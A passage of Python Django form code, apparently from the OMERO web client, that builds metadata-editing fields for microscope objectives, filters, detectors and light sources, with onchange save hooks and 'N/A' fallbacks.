self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "lensNA"
),
}
),
initial=kwargs["initial"]["objective"].lensNA,
label="Lens NA",
required=False,
)
else:
self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "lensNA"
),
}
),
required=False,
)
set_widget_attrs(self.fields["lensNA"])
except Exception:
self.fields["lensNA"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lens NA",
required=False,
)
set_widget_attrs(self.fields["lensNA"])
# Immersion
try:
if kwargs["initial"]["objective"].getImmersion() is not None:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"immersion",
options=True,
)
}
),
initial=kwargs["initial"]["objective"].getImmersion().value,
required=False,
)
else:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"immersion",
options=True,
)
}
),
required=False,
)
set_widget_attrs(self.fields["immersion"])
except Exception:
self.fields["immersion"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["immersion"])
# Correction
try:
if kwargs["initial"]["objective"].getCorrection() is not None:
self.fields["correction"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"correction",
options=True,
)
}
),
initial=kwargs["initial"]["objective"].getCorrection().value,
required=False,
)
else:
self.fields["correction"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id,
"correction",
options=True,
)
}
),
required=False,
)
set_widget_attrs(self.fields["correction"])
except Exception:
self.fields["correction"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["correction"])
# Working Distance
try:
if kwargs["initial"]["objective"].workingDistance is not None:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "workingDistance"
),
}
),
initial=kwargs["initial"]["objective"].workingDistance.getValue(),
label=(
"Working distance (%s)"
% kwargs["initial"]["objective"].workingDistance.getSymbol()
),
required=False,
)
else:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "workingDistance"
),
}
),
label="Working distance",
required=False,
)
set_widget_attrs(self.fields["workingDistance"])
except Exception:
self.fields["workingDistance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Working distance",
required=False,
)
set_widget_attrs(self.fields["workingDistance"])
# Iris
try:
if kwargs["initial"]["objective"].getIris() is not None:
self.fields["iris"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "iris", options=True
)
}
),
initial=kwargs["initial"]["objective"].getIris().value,
required=False,
)
else:
self.fields["iris"] = forms.ChoiceField(
choices=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objective"].id, "iris", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["iris"])
except Exception:
self.fields["iris"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["iris"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
]
class MetadataObjectiveSettingsForm(MetadataObjectiveForm):
BOOLEAN_CHOICES = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *args, **kwargs):
super(MetadataObjectiveSettingsForm, self).__init__(*args, **kwargs)
# Objective Settings
# Correction Collar
try:
if kwargs["initial"]["objectiveSettings"].correctionCollar is not None:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
initial=kwargs["initial"]["objectiveSettings"].correctionCollar,
label="Correction collar",
required=False,
)
else:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
label="Correction collar",
required=False,
)
set_widget_attrs(self.fields["correctionCollar"])
except Exception:
self.fields["correctionCollar"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Correction collar",
required=False,
)
set_widget_attrs(self.fields["correctionCollar"])
# Medium
try:
if kwargs["initial"]["objectiveSettings"].getMedium() is not None:
self.fields["medium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"medium",
options=True,
)
}
),
initial=kwargs["initial"]["objectiveSettings"].getMedium().value,
required=False,
)
else:
self.fields["medium"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"medium",
options=True,
)
}
),
required=False,
)
set_widget_attrs(self.fields["medium"])
except Exception:
self.fields["medium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["medium"])
# Refractive Index
try:
if kwargs["initial"]["objectiveSettings"].refractiveIndex is not None:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
initial=kwargs["initial"]["objectiveSettings"].refractiveIndex,
label="Refractive index",
required=False,
)
else:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
label="Refractive index",
required=False,
)
set_widget_attrs(self.fields["refractiveIndex"])
except Exception:
self.fields["refractiveIndex"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Refractive index",
required=False,
)
set_widget_attrs(self.fields["refractiveIndex"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
"correctionCollar",
"medium",
"refractiveIndex",
]
class MetadataFilterForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataFilterForm, self).__init__(*args, **kwargs)
# Filter
# Manufacturer
try:
if kwargs["initial"]["filter"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "manufacturer"
),
}
),
initial=kwargs["initial"]["filter"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "manufacturer"
),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if kwargs["initial"]["filter"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "model"
),
}
),
initial=kwargs["initial"]["filter"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "model"
),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Serial Number
try:
if kwargs["initial"]["filter"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "serialNumber"
),
}
),
initial=kwargs["initial"]["filter"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number
try:
if kwargs["initial"]["filter"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "lotNumber"
),
}
),
initial=kwargs["initial"]["filter"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Filter wheel
try:
if kwargs["initial"]["filter"].filterWheel is not None:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "filterWheel"
),
}
),
initial=kwargs["initial"]["filter"].filterWheel,
label="Filter wheel",
required=False,
)
else:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "filterWheel"
),
}
),
label="Filter wheel",
required=False,
)
set_widget_attrs(self.fields["filterWheel"])
except Exception:
self.fields["filterWheel"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Filter wheel",
required=False,
)
set_widget_attrs(self.fields["filterWheel"])
# Type
try:
if kwargs["initial"]["filter"].getFilterType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "type", options=True
)
}
),
initial=kwargs["initial"]["filter"].getFilterType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "type", options=True
)
}
),
required=False,
)
set_widget_attrs(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["type"])
# Cut in
tr = kwargs["initial"]["filter"].getTransmittanceRange()
try:
if tr is not None and tr.cutIn is not None:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutIn"
),
}
),
initial=kwargs["initial"]["filter"]
.getTransmittanceRange()
.cutIn.getValue(),
label="Cut in (%s)" % tr.cutIn.getSymbol(),
required=False,
)
else:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutIn"
),
}
),
label="Cut in",
required=False,
)
set_widget_attrs(self.fields["cutIn"])
except Exception:
self.fields["cutIn"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in",
required=False,
)
set_widget_attrs(self.fields["cutIn"])
# Cut out
try:
if tr is not None and tr.cutOut is not None:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
initial=tr.cutOut.getValue(),
label="Cut out (%s)" % tr.cutOut.getSymbol(),
required=False,
)
else:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out",
required=False,
)
set_widget_attrs(self.fields["cutOut"])
except Exception:
self.fields["cutOut"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out",
required=False,
)
set_widget_attrs(self.fields["cutOut"])
# Cut in tolerance
try:
if tr is not None and tr.cutInTolerance is not None:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutInTolerance"
),
}
),
initial=tr.cutInTolerance.getValue(),
label=("Cut in tolerance (%s)" % tr.cutInTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutInTolerance"
),
}
),
label="Cut in tolerance",
required=False,
)
set_widget_attrs(self.fields["cutInTolerance"])
except Exception:
self.fields["cutInTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in tolerance",
required=False,
)
set_widget_attrs(self.fields["cutInTolerance"])
# Cut on tolerance
try:
if tr is not None and tr.cutOutTolerance is not None:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
initial=tr.cutOutTolerance.getValue(),
label=("Cut out tolerance (%s)" % tr.cutOutTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out tolerance",
required=False,
)
set_widget_attrs(self.fields["cutOutTolerance"])
except Exception:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out tolerance",
required=False,
)
set_widget_attrs(self.fields["cutOutTolerance"])
# Transmittance
try:
if kwargs["initial"]["filter"].transmittanceRange is not None:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "transmittance"
),
}
),
initial=formatPercentFraction(
kwargs["initial"]["filter"]
.getTransmittanceRange()
.transmittance
),
label="Transmittance (%)",
required=False,
)
else:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(
kwargs["initial"]["filter"].id, "transmittance"
),
}
),
required=False,
)
set_widget_attrs(self.fields["transmittance"])
except Exception:
self.fields["transmittance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["transmittance"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"filterWheel",
"cutIn",
"cutOut",
"cutInTolerance",
"cutOutTolerance",
"transmittance",
]
class MetadataDetectorForm(forms.Form):
def __init__(self, *args, **kwargs):
super(MetadataDetectorForm, self).__init__(*args, **kwargs)
detSet = kwargs["initial"]["detectorSettings"]
detector = kwargs["initial"]["detector"]
# Manufacturer
try:
if detector is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "manufacturer"),
}
),
initial=detector.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "manufacturer"),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if detector is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "model"),
}
),
initial=detector.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "model"),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# SN
try:
if detector is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "serialNumber"),
}
),
initial=detector.serialNumber,
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "serialNumber"),
}
),
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot number (NB. Untill OMERO model is updated in 4.3, this will
# throw since lotNumber is not yet supported)
try:
if detector is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "lotNumber"),
}
),
initial=detector.lotNumber,
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "lotNumber"),
}
),
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Type
try:
if detector.getDetectorType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detector.id, "type", options=True)
}
),
initial=detector.getDetectorType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detector.id, "type", options=True)
}
),
required=False,
)
set_widget_attrs(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["type"])
# Gain
try:
if detSet is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
),
initial=detSet.gain,
required=False,
)
elif detector is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "gain"),
}
),
initial=detector.gain,
required=False,
)
else:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": save_metadata(detSet.id, "gain")}
),
required=False,
)
set_widget_attrs(self.fields["gain"])
except Exception:
self.fields["gain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["gain"])
# Voltage
try:
if detSet is not None and detSet.voltage is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "voltage"),
}
),
initial=detSet.voltage.getValue(),
label="Voltage (%s)" % detSet.voltage.getSymbol(),
required=False,
)
elif detector is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "voltage"),
}
),
initial=detector.voltage.getValue(),
label="Voltage (%s)" % detector.voltage.getSymbol(),
required=False,
)
else:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "voltage"),
}
),
required=False,
)
set_widget_attrs(self.fields["voltage"])
except Exception:
self.fields["voltage"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["voltage"])
# Offset
try:
if detSet is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "offsetValue"),
}
),
initial=detSet.offsetValue,
label="Offset",
required=False,
)
elif detector is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "offsetValue"),
}
),
initial=detector.offsetValue,
label="Offset",
required=False,
)
else:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "offsetValue"),
}
),
label="Offset",
required=False,
)
set_widget_attrs(self.fields["offsetValue"])
except Exception:
self.fields["offsetValue"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Offset",
required=False,
)
set_widget_attrs(self.fields["offsetValue"])
# Zoom
try:
if detector is not None:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "voltage"),
}
),
initial=detector.zoom,
required=False,
)
else:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "voltage"),
}
),
required=False,
)
set_widget_attrs(self.fields["zoom"])
except Exception:
self.fields["zoom"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["zoom"])
# Amplification gain
try:
if detector is not None:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "amplificationGain"),
}
),
initial=detector.amplificationGain,
label="Amplification gain",
required=False,
)
else:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detector.id, "amplificationGain"),
}
),
label="Amplification gain",
required=False,
)
set_widget_attrs(self.fields["amplificationGain"])
except Exception:
self.fields["amplificationGain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Amplification gain",
required=False,
)
set_widget_attrs(self.fields["amplificationGain"])
# Read out rate
try:
if detSet is not None and detSet.readOutRate is not None:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "readOutRate"),
}
),
initial=detSet.readOutRate.getValue(),
label=("Read out rate (%s)" % detSet.readOutRate.getSymbol()),
required=False,
)
else:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(detSet.id, "readOutRate"),
}
),
label="Read out rate",
required=False,
)
set_widget_attrs(self.fields["readOutRate"])
except Exception:
self.fields["readOutRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Read out rate",
required=False,
)
set_widget_attrs(self.fields["readOutRate"])
# Binning
try:
if detSet is not None:
self.fields["binning"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detSet.id, "type", options=True)
}
),
initial=detSet.getBinning().value,
required=False,
)
else:
self.fields["binning"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(detSet.id, "type", options=True)
}
),
required=False,
)
set_widget_attrs(self.fields["binning"])
except Exception:
self.fields["binning"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["binning"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"gain",
"voltage",
"offsetValue",
"zoom",
"amplificationGain",
"readOutRate",
"binning",
]
class MetadataLightSourceForm(forms.Form):
BOOLEAN_CHOICES = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *args, **kwargs):
super(MetadataLightSourceForm, self).__init__(*args, **kwargs)
lightSource = kwargs["initial"]["lightSource"]
lightSourceSettings = None
if "lightSourceSettings" in kwargs["initial"]:
lightSourceSettings = kwargs["initial"]["lightSourceSettings"]
self.lightSourceType = lightSource.OMERO_CLASS
# Manufacturer
try:
if lightSource.manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
initial=lightSource.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["manufacturer"])
# Model
try:
if lightSource.model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
initial=lightSource.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "model"),
}
),
required=False,
)
set_widget_attrs(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["model"])
# Serial Number
try:
if lightSource.serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "serialNumber"),
}
),
initial=lightSource.serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "serialNumber"),
}
),
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
set_widget_attrs(self.fields["serialNumber"])
# Lot Number
try:
if lightSource.lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "lotNumber"),
}
),
initial=lightSource.lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "lotNumber"),
}
),
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
set_widget_attrs(self.fields["lotNumber"])
# Power
try:
if lightSource.power is not None:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "power"),
}
),
initial=lightSource.power.getValue(),
label="Power (%s)" % lightSource.power.getSymbol(),
required=False,
)
else:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": save_metadata(lightSource.id, "power"),
}
),
required=False,
)
set_widget_attrs(self.fields["power"])
except Exception:
self.fields["power"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
set_widget_attrs(self.fields["power"])
# Type
try:
if lightSource.getLightSourceType() is not None:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=kwargs["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": save_metadata(
lightSource.id, "type", options=True
)
